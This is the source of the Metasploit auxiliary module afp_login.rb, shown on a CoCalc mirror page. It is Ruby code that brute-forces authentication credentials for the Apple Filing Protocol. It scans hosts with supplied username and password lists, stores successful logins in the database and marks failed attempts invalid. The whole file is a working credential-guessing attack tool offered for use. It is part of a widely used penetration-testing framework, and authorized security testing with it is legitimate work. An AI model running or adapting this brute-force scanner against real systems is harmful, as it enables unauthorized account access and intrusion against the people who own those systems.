CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/afp/afp_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'openssl'6require 'metasploit/framework/credential_collection'7require 'metasploit/framework/login_scanner/afp'89class MetasploitModule < Msf::Auxiliary10include Msf::Auxiliary::Report11include Msf::Auxiliary::Scanner12include Msf::Auxiliary::AuthBrute13include Msf::Exploit::Remote::AFP1415def initialize(info={})16super(update_info(info,17'Name' => 'Apple Filing Protocol Login Utility',18'Description' => %q{19This module attempts to bruteforce authentication credentials for AFP.20},21'References' =>22[23[ 'URL', 'https://web.archive.org/web/20130309051753/https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],24[ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]2526],27'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],28'License' => MSF_LICENSE29))3031register_options(32[33Opt::Proxies,34OptInt.new('LoginTimeOut', [ true, "Timeout on login", 23 ]),35OptBool.new('RECORD_GUEST', [ false, "Record guest login to the database", false]),36OptBool.new('CHECK_GUEST', [ false, "Check for guest login", true])37], self)38end3940def run_host(ip)41print_status("Scanning IP: #{ip.to_s}")4243cred_collection = build_credential_collection(44username: datastore['USERNAME'],45password: datastore['PASSWORD'],46)4748scanner = Metasploit::Framework::LoginScanner::AFP.new(49configure_login_scanner(50host: ip,51port: rport,52proxies: datastore['PROXIES'],53cred_details: cred_collection,54stop_on_success: datastore['STOP_ON_SUCCESS'],55bruteforce_speed: datastore['BRUTEFORCE_SPEED'],56connection_timeout: 30,57max_send_size: datastore['TCP::max_send_size'],58send_delay: datastore['TCP::send_delay'],59framework: framework,60framework_module: self,61ssl: datastore['SSL'],62ssl_version: datastore['SSLVersion'],63ssl_verify_mode: datastore['SSLVerifyMode'],64ssl_cipher: datastore['SSLCipher'],65local_port: datastore['CPORT'],66local_host: datastore['CHOST']67)68)6970scanner.scan! do |result|71credential_data = result.to_h72credential_data.merge!(73module_fullname: self.fullname,74workspace_id: myworkspace_id75)76if result.success?77credential_core = create_credential(credential_data)78credential_data[:core] = credential_core79create_credential_login(credential_data)8081print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"82else83invalidate_login(credential_data)84vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"85end86end87end888990end919293